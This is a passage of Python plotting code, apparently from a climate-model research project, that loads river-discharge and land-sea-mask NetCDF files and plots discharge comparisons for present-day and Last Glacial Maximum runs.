print(total_discharge_info)
def plot_comparison_using_1990_rainfall_data_adding_back_to_discharge(self):
ax = plt.subplots(1, 1, figsize=(12, 9))[1]
plt.ylim(0,7000000)
plt.xlim(1,365)
plt.xlabel("Time/days")
plt.ylabel("Discharge Rate/m^3/s")
total_discharge_info=""
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output_from_current_model_after_100_cycles.nc"),
rdirs_filepath=\
os.path.join(self.rdirs_data_directory,
"rdirs_from_current_hdparas.nc"),
num_timeslices=365,label="Current Model HD Run using 100 cycle spin-up")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_one_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170116_235534.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up as basis")
lost_discharge = self._calculate_discharge_lost_to_changes_in_lsmask(lsmask_source_ref_filepath=\
os.path.join(self.jsbach_restart_file_directory,
"jsbach_T106_11tiles_5layers_1976.nc"),
lsmask_source_data_filepath=\
os.path.join(self.generated_jsbach_restart_file_directory,
"updated_jsbach_T106_11tiles_5layers_1976_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc"),
run_off_filepath=os.path.join(self.hdinput_data_directory,'runoff_T106_1990.nc'),
discharge_filepath=os.path.join(self.hdinput_data_directory,'drainage_T106_1990.nc'),
cell_areas_filepath=os.path.join(self.cell_areas_data_directory,'T106_grid_cell_areas.nc'),
num_timeslices=365,grid_type="T106")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_one_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,lost_discharge=lost_discharge,label="Dynamic HD using 1 cycle spin-up + lost discharge")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_thirty_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,lost_discharge=lost_discharge,label="Dynamic HD using 30 cycle spin-up + lost discharge")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170116_235534.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,lost_discharge=lost_discharge,label="Dynamic HD using 1 cycle spin-up as basis+ lost discharge")
ax.legend()
print(total_discharge_info)
class CoupledRunOutputPlots(HDOutputPlots):
"""A class for plotting the output of coupled runs"""
def __init__(self,save=False,color_palette_to_use="default"):
"""Class constructor."""
super(CoupledRunOutputPlots,self).__init__(save,color_palette_to_use)
def ice6g_rdirs_lgm_run_discharge_plot(self):
""" """
cell_areas = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/"
"gridareasandspacings/hdcellareas.nc",".nc",
field_type='Generic',fieldname="cell_area",
grid_type='HD')
rdirs = iodriver.load_field(os.path.join(self.rdirs_data_directory,
"generated","upscaled",
"upscaled_rdirs_ICE5G_21k_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale"
"_rdirs_tarasov_orog_corrs_generation_and_"
"upscaling_20170615_174943_upscaled_updated"
"_transf.nc"),
".nc",field_type='Generic',grid_type='HD')
outdata_data = None
for time in range(120):
discharge = iodriver.load_field(os.path.join(self.river_discharge_output_data_path,
"rid0004_hd_higres_mon_79900101_79991231.nc"),
".nc",field_type='Generic',fieldname="friv",timeslice=time,
grid_type='HD')
if not outdata_data:
outflow_data = discharge.get_data()
else:
outflow_data = outflow_data + discharge.get_data()
outflow_data[ rdirs.get_data() != 0 ] = 0.0
outflow_times_area = outflow_data*cell_areas.get_data()
plt.figure()
plt.imshow(outflow_times_area,norm=mpl.colors.LogNorm(),interpolation='none')
plt.colorbar()
def extended_present_day_rdirs_lgm_run_discharge_plot(self):
""" """
cell_areas = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/"
"gridareasandspacings/hdcellareas.nc",".nc",
field_type='Generic',fieldname="cell_area",
grid_type='HD')
rdirs = iodriver.load_field(os.path.join(self.rdirs_data_directory,
"rivdir_vs_1_9_data_from_stefan.nc"),
".nc",field_type='Generic',grid_type='HD')
outdata_data = None
for time in range(120):
discharge = iodriver.load_field(os.path.join(self.river_discharge_output_data_path,
"rid0003_hd_higres_mon_79900101_79991231.nc"),
".nc",field_type='Generic',fieldname="friv",timeslice=time,
grid_type='HD')
if not outdata_data:
outflow_data = discharge.get_data()
else:
outflow_data = outflow_data + discharge.get_data()
outflow_data[ rdirs.get_data() != 0 ] = 0.0
outflow_times_area = outflow_data*cell_areas.get_data()
plt.figure()
plt.imshow(outflow_times_area,norm=mpl.colors.LogNorm(),interpolation='none')
plt.colorbar()
def extended_present_day_rdirs_vs_ice6g_rdirs_lgm_echam(self):
difference_in_lgm_data_filename=os.path.join(self.river_discharge_output_data_path,
"rid0004_minus_rid0003_jsbach_jsbach"
"_mm_last_100_year_mean_times_area.nc")
lgm_lsmask_file = os.path.join(self.river_discharge_output_data_path,
"rid0003_jsbach_jsbach_tm_7900-7999.nc")
with Dataset(difference_in_lgm_data_filename,
mode='r',format='NETCDF4') as dataset:
fields = dataset.get_variables_by_attributes(name="var218")
difference_field = np.asarray(fields[0])[0,:,:]
with Dataset(lgm_lsmask_file,mode='r',format='NETCDF4'):
fields = dataset.get_variables_by_attributes(name="land_fract")
lgm_lsmask_file = np.asarray(fields[0])[0,:,:]
difference_field_masked = np.ma.array(difference_field,
mask=lgm_lsmask_file)
plt.figure()
plt.imshow(difference_field_masked,interpolation='none')
cb = plt.colorbar()
cb.set_label(r"River Discharge ($m^{3}s^{-1}$)")
nlat=48
nlon=96
difference_field_total_horizontal_slice =\
np.mean(difference_field,axis=0)*nlat
difference_field_total_vertical_slice =\
np.mean(difference_field,axis=1)*nlon
xvalues1 = np.linspace(0,360,num=96)
ax1 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax1.plot(xvalues1,difference_field_total_horizontal_slice)
ax1.set_xlabel("Longitude (Degrees East)")
ax1.set_ylabel(r'River Discharge ($m^{3}s^{-1}$)')
ax1.set_title("Latitudal Totals")
ax1.set_xlim(0,360)
xvalues2 = np.linspace(-90,90,num=48)
ax2 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax2.plot(xvalues2,np.flipud(difference_field_total_vertical_slice))
ax2.set_xlabel("Latitude (Degrees North)")
ax2.set_ylabel(r'River Discharge ($m^{3}s^{-1}$)')
ax2.set_title("Longitude Totals")
ax2.set_xlim(-90,90)
pacific_unmasked = np.zeros((48,96),dtype=np.bool)
pacific_unmasked[0:7,:] = True
pacific_unmasked[:,0:7] = True
pacific_unmasked[:18,70:] = True
pacific_unmasked[18:21,72:] = True
pacific_unmasked[21:,77:] = True
atlantic_unmasked = np.invert(pacific_unmasked)
difference_field_pacific_unmasked =\
np.ma.array(difference_field,mask=pacific_unmasked)
difference_field_pacific_unmasked.filled(0)
difference_field_pacific_unmasked_total_vertical_slice =\
np.mean(difference_field_pacific_unmasked,axis=1)*nlon
ax3 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax3.plot(xvalues2,
np.flipud(difference_field_pacific_unmasked_total_vertical_slice))
ax3.set_xlim(-90,90)
ax3.set_xlabel("Latitude (Degrees North)")
ax3.set_ylabel(r'River Discharge Difference ($m^{3}s^{-1}$)')
ax3.set_title("Indo-Pacific")
difference_field_atlantic_unmasked =\
np.ma.array(difference_field,mask=atlantic_unmasked)
difference_field_atlantic_unmasked.filled(0)
difference_field_atlantic_unmasked_total_vertical_slice =\
np.mean(difference_field_atlantic_unmasked,axis=1)*nlon
ax4 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax4.plot(xvalues2,
np.flipud(difference_field_atlantic_unmasked_total_vertical_slice))
ax4.set_xlim(-90,90)
ax4.set_xlabel("Latitude (Degrees North)")
ax4.set_ylabel(r'River Discharge Difference ($m^{3}s^{-1}$)')
ax4.set_title("Atlantic")
difference_field_atlantic_unmasked_total_vertical_slice_summed = \
np.zeros(len(difference_field_atlantic_unmasked_total_vertical_slice))
it = np.nditer([difference_field_atlantic_unmasked_total_vertical_slice,
difference_field_atlantic_unmasked_total_vertical_slice_summed],
op_flags=['readwrite'])
cumulative_sum = 0
for x,y in it:
cumulative_sum += x
y[...] = cumulative_sum
ax5 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax5.plot(xvalues2,
np.flipud(difference_field_atlantic_unmasked_total_vertical_slice_summed))
ax5.set_xlim(-90,90)
ax5.set_xlabel("Latitude (Degrees North)")
ax5.set_ylabel(r'Cumulative River Discharge Difference ($m^{3}s^{-1}$)')
ax5.set_title("Integrated Atlantic Discharge Starting from the North Pole")
difference_field_pacific_unmasked_total_vertical_slice_summed = \
np.zeros(len(difference_field_pacific_unmasked_total_vertical_slice))
it = np.nditer([difference_field_pacific_unmasked_total_vertical_slice,
difference_field_pacific_unmasked_total_vertical_slice_summed],
op_flags=['readwrite'])
cumulative_sum = 0
for x,y in it:
cumulative_sum += x
y[...] = cumulative_sum
ax6 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax6.plot(xvalues2,
np.flipud(difference_field_pacific_unmasked_total_vertical_slice_summed))
ax6.set_xlim(-90,90)
ax6.set_xlabel("Latitude (Degrees North)")
ax6.set_ylabel(r'Cumulative River Discharge Difference ($m^{3}s^{-1}$)')
ax6.set_title("Integrated Indo-Pacific Discharge Starting from the North Pole")
# difference_field_positive = np.copy(difference_field)
# difference_field_negative = -1.0*np.copy(difference_field)
# difference_field_positive[difference_field < 0] = 0
# difference_field_negative[difference_field > 0] = 0
# plt.imshow(difference_field_positive,norm=mpl.colors.LogNorm(),interpolation='none') # plt.imshow(difference_field_negative,norm=mpl.colors.LogNorm(),interpolation='none')
# plt.colorbar()
def extended_present_day_rdirs_vs_ice6g_rdirs_lgm_mpiom_pem(self):
difference_in_lgm_data_filename=os.path.join(self.river_discharge_output_data_path,
"rid0004_minus_rid0003_mpim_data_2d_mm"
"_last_100_years_premeaned_non_nan.nc")
mpiom_lgm_mask_filename=os.path.join(self.river_discharge_output_data_path,
"rid0004landseamask.np")
with Dataset(difference_in_lgm_data_filename,
mode='r',format='NETCDF4') as dataset:
fields = dataset.get_variables_by_attributes(name="pem")
difference_field = np.asarray(fields[0])[0,0,:,:]
with Dataset(mpiom_lgm_mask_filename,
mode='r',format='NETCDF4') as dataset:
fields = dataset.get_variables_by_attributes(name="pem")
lsmask = np.asarray(fields[0])[0,0,:,:]
difference_field_masked = np.ma.array(difference_field,mask=lsmask)
plt.figure()
plt.imshow(difference_field_masked,interpolation='none')
cb = plt.colorbar()
cb.set_label(r"Water Flux Into Ocean $(m^{3}s^{-1})$")
def ocean_grid_extended_present_day_rdirs_vs_ice6g_rdirs_lgm_run_discharge_plot(self):
extended_present_day_rdirs_data_filename=os.path.join(self.river_discharge_output_data_path,
"rid0003_mpiom_data_moc_mm_last_100_years.nc")
ice6g_rdirs_data_filename=os.path.join(self.river_discharge_output_data_path,
"rid0004_mpiom_data_moc_mm_last_100_years.nc")
difference_on_ocean_grid_filename=os.path.join(self.river_discharge_output_data_path,
"rid0004_minus_0003_mpiom_data_moc_mm"
"_last_100_years.nc")
with Dataset(extended_present_day_rdirs_data_filename,
mode='r',format='NETCDF4') as dataset:
fields = dataset.get_variables_by_attributes(name="atlantic_wfl")
atlantic_wfl_ext = np.asarray(fields[0])
fields = dataset.get_variables_by_attributes(name="indopacific_wfl")
indopacific_wfl_ext = np.asarray(fields[0])
with Dataset(ice6g_rdirs_data_filename,
mode='r',format='NETCDF4') as dataset:
fields = dataset.get_variables_by_attributes(name="atlantic_wfl")
atlantic_wfl_ice6g = np.asarray(fields[0])
fields = dataset.get_variables_by_attributes(name="indopacific_wfl")
indopacific_wfl_ice6g = np.asarray(fields[0])
with Dataset(difference_on_ocean_grid_filename,mode='r',format='NETCDF4') as dataset:
fields = dataset.get_variables_by_attributes(name="atlantic_wfl")
atlantic_wfl_diff = np.asarray(fields[0])
fields = dataset.get_variables_by_attributes(name="indopacific_wfl")
indopacific_wfl_diff = np.asarray(fields[0])
x = np.linspace(-90,90,num=180)
atlantic_wfl_temporalmean_diff = np.mean(atlantic_wfl_diff,axis=0)[0,:,0]
indopacific_wfl_temporalmean_diff = np.mean(indopacific_wfl_diff,axis=0)[0,:,0]
atlantic_wfl_temporalmean_ext = np.mean(atlantic_wfl_ext,axis=0)[0,:,0]
indopacific_wfl_temporalmean_ext = np.mean(indopacific_wfl_ext,axis=0)[0,:,0]
atlantic_wfl_temporalmean_ice6g = np.mean(atlantic_wfl_ice6g,axis=0)[0,:,0]
indopacific_wfl_temporalmean_ice6g = np.mean(indopacific_wfl_ice6g,axis=0)[0,:,0]
atlantic_bins = [-90,-55,-12,0,31,65,90]
pacific_bins = [-90,-56,65,90]
def bin_values(bins,values):
binned_values = np.zeros((np.size(bins)))
for i,cell in zip(x,values):
for j,bin_edge in enumerate(bins):
if i > bin_edge:
binned_values[j] += cell
continue
return binned_values
atlantic_bin_wfl_temporalmean_diff = \
bin_values(atlantic_bins,
atlantic_wfl_temporalmean_diff)
indopacific_bin_wfl_temporalmean_diff = \
bin_values(pacific_bins,
indopacific_wfl_temporalmean_diff)
ax1 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax1_step = plt.subplots(1, 1, figsize=(12, 9))[1]
ax1.plot(x,atlantic_wfl_temporalmean_ext,'.',
label='Extended Present Day River Directions')
ax1.plot(x,atlantic_wfl_temporalmean_ice6g,'.',
label='ICE6G River Directions')
ax1.set_xlabel("Latitude (Degrees North)")
ax1.set_ylabel("Implied Freshwater Transport ($m^{3}s^{-1}$)")
ax1.set_xlim(-90,90)
ax1.set_xticks([-90,-60,-30,0,30,60,90])
ax1.legend()
ax1.set_title("Atlantic")
ax1_step.step(atlantic_bins,
atlantic_bin_wfl_temporalmean_diff,
where='post',
label='Atlantic')
ax1_step.step(pacific_bins,
indopacific_bin_wfl_temporalmean_diff,
where='post',
label='Indo-Pacific')
ax1_step.set_xlim(-90,90)
ax1_step.set_xticks([-90,-60,-30,0,30,60,90])
ax1_step.set_xlabel("Latitude (Degrees North)")
ax1_step.set_ylabel("Implied Freshwater Transport ($m^{3}s^{-1}$)")
ax1_step.legend()
ax2 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax2.plot(x,indopacific_wfl_temporalmean_ext,'.',
label='Extended Present Day River Directions')
ax2.plot(x,indopacific_wfl_temporalmean_ice6g,'.',
label='ICE6G River Directions')
ax2.set_xlabel("Latitude (Degrees North)")
ax2.set_ylabel("Implied Freshwater Transport ($m^{3}s^{-1}$)")
ax2.set_xlim(-90,90)
ax2.set_xticks([-90,-60,-30,0,30,60,90])
ax2.set_title("Indo-Pacific")
ax2.legend()
ax3 = plt.subplots(1, 1, figsize=(12, 9))[1]
ax3.plot(x,atlantic_wfl_temporalmean_diff,'.',
label='Atlantic')
ax3.plot(x,indopacific_wfl_temporalmean_diff,'.',
label='Indo-Pacific')
ax3.set_xlabel("Latitude (Degrees North)")
ax3.set_ylabel(r'Change in Implied Freshwater Transport ($m^{3}s^{-1}$)')
ax3.set_xlim(-90,90)
ax3.set_xticks([-90,-60,-30,0,30,60,90])
ax3.legend()
class OutflowPlots(Plots):
"""A class for river mouth outflow plots"""
rmouth_outflow_path_extension = 'rmouthflow'
flow_maps_path_extension = 'flowmaps'
rdirs_path_extension = 'rdirs'
catchments_path_extension = 'catchmentmaps'
orog_path_extension = 'orographys'
additional_matches_list_extension = 'addmatches'
catchment_and_outflows_mods_list_extension = 'catchmods'
ls_mask_path_extension="lsmasks"
def __init__(self,save,color_palette_to_use='default'):
super(OutflowPlots,self).__init__(save,color_palette_to_use)
self.rmouth_outflow_data_directory = os.path.join(self.hd_data_path,self.rmouth_outflow_path_extension)
self.flow_maps_data_directory = os.path.join(self.hd_data_path,self.flow_maps_path_extension)
self.rdirs_data_directory = os.path.join(self.hd_data_path,self.rdirs_path_extension)
self.catchments_data_directory = os.path.join(self.hd_data_path,self.catchments_path_extension)
self.orog_data_directory = os.path.join(self.hd_data_path,self.orog_path_extension)
self.ls_mask_data_directory = os.path.join(self.hd_data_path,self.ls_mask_path_extension)
self.additional_matches_list_directory = os.path.join(self.hd_data_path,
self.additional_matches_list_extension)
self.catchment_and_outflows_mods_list_directory = os.path.join(self.hd_data_path,
self.catchment_and_outflows_mods_list_extension)
self.temp_label = 'temp_' + datetime.datetime.now().strftime("%Y%m%d_%H%M%S%f") + "_"
def OutFlowComparisonPlotHelpers(self,reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
ref_flowmaps_filename,data_flowmaps_filename,
rdirs_filename,flip_data_field=False,rotate_data_field=False,
flip_ref_field=False,rotate_ref_field=False,
ref_catchment_filename=None,data_catchment_filename=None,
data_catchment_original_scale_filename=None,
data_rdirs_filename=None,
data_original_scale_flow_map_filename=None,
ref_orog_filename=None,
data_orog_original_scale_filename=None,
flip_orog_original_scale_relative_to_data=False,
super_fine_orog_filename=None,
super_fine_data_flowmap_filename=None,
flip_super_fine_orog=False,
rotate_super_fine_orog=False,
additional_matches_list_filename=None,
catchment_and_outflows_mods_list_filename=None,
plot_simple_catchment_and_flowmap_plots=False,
return_simple_catchment_and_flowmap_plotters=False,
return_catchment_plotters=False,
swap_ref_and_data_when_finding_labels=False,
rivers_to_plot=None,
alternative_catchment_bounds=None,
matching_parameter_set='default',
split_comparison_plots_across_multiple_canvases=False,
use_simplified_catchment_colorscheme=False,
use_simplified_flowmap_colorscheme=False,
use_upscaling_labels=False,
select_only_rivers_in=None,
allow_new_true_sinks=False,
ref_original_scale_flow_map_filename=None,
ref_catchment_original_scale_filename=None,
use_original_scale_field_for_determining_data_and_ref_labels=False,
external_ls_mask_filename=None,
flip_external_ls_mask=False,
rotate_external_ls_mask=False,
ref_original_scale_grid_type='HD',
grid_type='HD',data_original_scale_grid_type='HD',
super_fine_orog_grid_type='HD',
data_original_scale_grid_kwargs={},
ref_original_scale_grid_kwargs={},
super_fine_orog_grid_kwargs={},
**grid_kwargs):
"""Help produce a comparison of two fields of river outflow data"""
ref_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,ref_flowmaps_filename)
data_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,data_flowmaps_filename)
rdirs_filepath = os.path.join(self.rdirs_data_directory,rdirs_filename)
if ref_catchment_filename:
ref_catchments_filepath = os.path.join(self.catchments_data_directory,
ref_catchment_filename)
if data_catchment_filename:
data_catchment_filepath = os.path.join(self.catchments_data_directory,
data_catchment_filename)
if data_rdirs_filename:
data_rdirs_filepath = os.path.join(self.rdirs_data_directory,
data_rdirs_filename)
if ref_orog_filename:
ref_orog_filepath = os.path.join(self.orog_data_directory,
ref_orog_filename)
if data_orog_original_scale_filename:
data_orog_original_scale_filepath = os.path.join(self.orog_data_directory,
data_orog_original_scale_filename)
if data_catchment_original_scale_filename:
data_catchment_original_scale_filepath = os.path.join(self.catchments_data_directory,
data_catchment_original_scale_filename)
if ref_catchment_original_scale_filename:
ref_catchment_original_scale_filepath = os.path.join(self.catchments_data_directory,
ref_catchment_original_scale_filename)
if catchment_and_outflows_mods_list_filename:
catchment_and_outflows_mods_list_filepath = os.path.join(self.catchment_and_outflows_mods_list_directory,
catchment_and_outflows_mods_list_filename)
if additional_matches_list_filename:
additional_matches_list_filepath = os.path.join(self.additional_matches_list_directory,
additional_matches_list_filename)
if external_ls_mask_filename:
external_ls_mask_filepath = os.path.join(self.ls_mask_data_directory,
external_ls_mask_filename)
if super_fine_orog_filename:
super_fine_orog_filepath = os.path.join(self.orog_data_directory,
super_fine_orog_filename)
if super_fine_data_flowmap_filename:
super_fine_data_flowmap_filepath = os.path.join(self.flow_maps_data_directory,
super_fine_data_flowmap_filename)
if ref_catchment_filename:
ref_catchment_field = iohlpr.NetCDF4FileIOHelper.load_field(ref_catchments_filepath,
grid_type,**grid_kwargs)
if data_catchment_filename:
data_catchment_field =\
iohlpr.NetCDF4FileIOHelper.load_field(data_catchment_filepath,
grid_type,**grid_kwargs)
if grid_type == data_original_scale_grid_type and grid_kwargs == data_original_scale_grid_kwargs:
catchment_grid_changed = False
data_catchment_field_original_scale = data_catchment_field
else:
catchment_grid_changed = True
if data_catchment_original_scale_filepath is None:
raise RuntimeError('require original scale catchment to use upscaled catchments')
data_catchment_field_original_scale =\
iohlpr.NetCDF4FileIOHelper.load_field(data_catchment_original_scale_filepath,
grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
if data_original_scale_flow_map_filename is None:
raise RuntimeError('require original flow to cell data to use upscaled catchments')
else:
data_original_scale_flow_map_filepath = os.path.join(self.flow_maps_data_directory,
data_original_scale_flow_map_filename)
data_original_scale_flowtocellfield = iohlpr.NetCDF4FileIOHelper.\
load_field(data_original_scale_flow_map_filepath,grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
if use_original_scale_field_for_determining_data_and_ref_labels:
if ref_original_scale_flow_map_filename is None:
raise RuntimeError('require original flow to cell field to use upscaled catchments for ref')
elif ref_catchment_original_scale_filename is None:
raise RuntimeError('require original scale catchment to use upscaled catchments for ref')
else:
ref_original_scale_flow_map_filepath = os.path.join(self.flow_maps_data_directory,
ref_original_scale_flow_map_filename)
ref_original_scale_flowtocellfield = iohlpr.NetCDF4FileIOHelper.\
load_field(ref_original_scale_flow_map_filepath,grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
ref_catchment_field_original_scale =\
iohlpr.NetCDF4FileIOHelper.load_field(ref_catchment_original_scale_filepath,
grid_type=ref_original_scale_grid_type,
**ref_original_scale_grid_kwargs)
else:
ref_original_scale_flowtocellfield = None
ref_catchment_field_original_scale = None
ref_flowtocellfield = iohlpr.NetCDF4FileIOHelper.load_field(ref_flowmaps_filepath,grid_type,**grid_kwargs)
data_flowtocellfield = iohlpr.NetCDF4FileIOHelper.load_field(data_flowmaps_filepath,grid_type,**grid_kwargs)
rdirs_field = iohlpr.NetCDF4FileIOHelper.load_field(rdirs_filepath,grid_type,**grid_kwargs)
ref_grid = grid.makeGrid(grid_type,**grid_kwargs)
if data_rdirs_filename:
if catchment_grid_changed:
data_rdirs_field = iohlpr.NetCDF4FileIOHelper.load_field(data_rdirs_filepath,
grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
data_rdirs_field = utilities.upscale_field(input_field=field.\
Field(data_rdirs_field,
grid=data_original_scale_grid_type,
**data_original_scale_grid_kwargs),
output_grid_type=grid_type,
method='CheckValue',
output_grid_kwargs=grid_kwargs,
scalenumbers=False).get_data()
else:
data_rdirs_field = iohlpr.NetCDF4FileIOHelper.load_field(data_rdirs_filepath,grid_type,
**grid_kwargs)
else:
data_rdirs_field = None
if ref_orog_filename:
ref_orog_field = iohlpr.NetCDF4FileIOHelper.load_field(ref_orog_filepath,grid_type,
**grid_kwargs)
ref_orog_field = np.ma.array(ref_orog_field)
if data_orog_original_scale_filename:
data_orog_original_scale_field = iohlpr.NetCDF4FileIOHelper.\
load_field(data_orog_original_scale_filepath,
grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
fine_grid = grid.makeGrid(data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
if flip_orog_original_scale_relative_to_data:
#This is an extra flip along with the flip applied below
data_orog_original_scale_field = np.flipud(data_orog_original_scale_field)
else:
fine_grid = ref_grid
if super_fine_orog_filename:
super_fine_orog_field = iohlpr.NetCDF4FileIOHelper.\
load_field(super_fine_orog_filepath,
grid_type=super_fine_orog_grid_type,
**super_fine_orog_grid_kwargs)
super_fine_grid = grid.makeGrid(super_fine_orog_grid_type,
**super_fine_orog_grid_kwargs)
if super_fine_data_flowmap_filename:
super_fine_data_flowmap = iohlpr.NetCDF4FileIOHelper.\
load_field(super_fine_data_flowmap_filepath,
grid_type=super_fine_orog_grid_type,
**super_fine_orog_grid_kwargs)
else:
super_fine_data_flowmap = None
if flip_super_fine_orog:
super_fine_orog_field = np.flipud(super_fine_orog_field)
if super_fine_data_flowmap is not None:
super_fine_data_flowmap = np.flipud(super_fine_data_flowmap)
if rotate_super_fine_orog:
super_fine_orog_field = np.roll(super_fine_orog_field,
np.size(super_fine_orog_field,
axis=1)/2,
axis=1)
if super_fine_data_flowmap is not None:
super_fine_data_flowmap = np.roll(super_fine_data_flowmap,
np.size(super_fine_data_flowmap,
axis=1)/2,
axis=1)
else:
super_fine_orog_field = None
super_fine_data_flowmap = None
super_fine_grid = ref_grid
if external_ls_mask_filename:
external_ls_mask = iohlpr.NetCDF4FileIOHelper.\
load_field(external_ls_mask_filepath,
grid_type=grid_type,
**grid_kwargs)
else:
external_ls_mask = None
if flip_ref_field:
ref_flowtocellfield = np.flipud(ref_flowtocellfield)
rdirs_field = np.flipud(rdirs_field)
if ref_catchment_filename:
ref_catchment_field = np.flipud(ref_catchment_field)
if use_original_scale_field_for_determining_data_and_ref_labels:
ref_original_scale_flowtocellfield = np.flipud(ref_original_scale_flowtocellfield)
ref_catchment_field_original_scale = np.flipud(ref_catchment_field_original_scale)
if flip_data_field:
data_flowtocellfield = np.flipud(data_flowtocellfield)
if data_rdirs_filename:
data_rdirs_field = np.flipud(data_rdirs_field)
if data_catchment_filename:
data_catchment_field = np.flipud(data_catchment_field)
if catchment_grid_changed:
data_original_scale_flowtocellfield = np.flipud(data_original_scale_flowtocellfield)
data_catchment_field_original_scale = np.flipud(data_catchment_field_original_scale)
if data_orog_original_scale_filename:
data_orog_original_scale_field = np.flipud(data_orog_original_scale_field)
if rotate_ref_field:
ref_flowtocellfield = np.roll(ref_flowtocellfield,
np.size(ref_flowtocellfield,axis=1)/2,
axis=1)
rdirs_field = np.roll(rdirs_field,
np.size(rdirs_field,axis=1)/2,
axis=1)
if ref_catchment_filename:
ref_catchment_field = np.roll(ref_catchment_field,
np.size(ref_catchment_field,axis=1)/2,
axis=1)
if use_original_scale_field_for_determining_data_and_ref_labels:
ref_original_scale_flowtocellfield = np.roll(ref_original_scale_flowtocellfield,
np.size(ref_original_scale_flowtocellfield,
axis=1)/2,
axis=1)
ref_catchment_field_original_scale = np.roll(ref_catchment_field_original_scale,
np.size(ref_catchment_field_original_scale,
axis=1)/2,
axis=1)
if rotate_data_field:
data_flowtocellfield = np.roll(data_flowtocellfield,
np.size(data_flowtocellfield,axis=1)/2,
axis=1)
if data_rdirs_filename:
data_rdirs_field = np.roll(data_rdirs_field,
np.size(data_rdirs_field,axis=1)/2,
axis=1)
if data_catchment_filename:
data_catchment_field = np.roll(data_catchment_field,
np.size(data_catchment_field,axis=1)/2,
axis=1)
if catchment_grid_changed:
data_original_scale_flowtocellfield = np.roll(data_original_scale_flowtocellfield,
np.size(data_original_scale_flowtocellfield,
axis=1)/2,
axis=1)
data_catchment_field_original_scale = np.roll(data_catchment_field_original_scale,
np.size(data_catchment_field_original_scale,
axis=1)/2,
axis=1)
if data_orog_original_scale_filename:
data_orog_original_scale_field = np.roll(data_orog_original_scale_field,
np.size(data_orog_original_scale_field,
axis=1)/2,
axis=1)
else:
data_orog_original_scale_field = None
if flip_external_ls_mask:
external_ls_mask = np.flipud(external_ls_mask)
if rotate_external_ls_mask:
external_ls_mask = np.roll(external_ls_mask,
np.size(external_ls_mask,
axis=1)/2,
axis=1)
temp_file_list = []
if catchment_and_outflows_mods_list_filename:
ref_outflow_field = iodriver.load_field(reference_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
